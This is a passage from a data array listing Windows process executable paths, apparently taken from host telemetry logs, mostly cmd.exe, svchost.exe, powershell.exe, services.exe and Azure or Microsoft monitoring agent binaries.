md.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01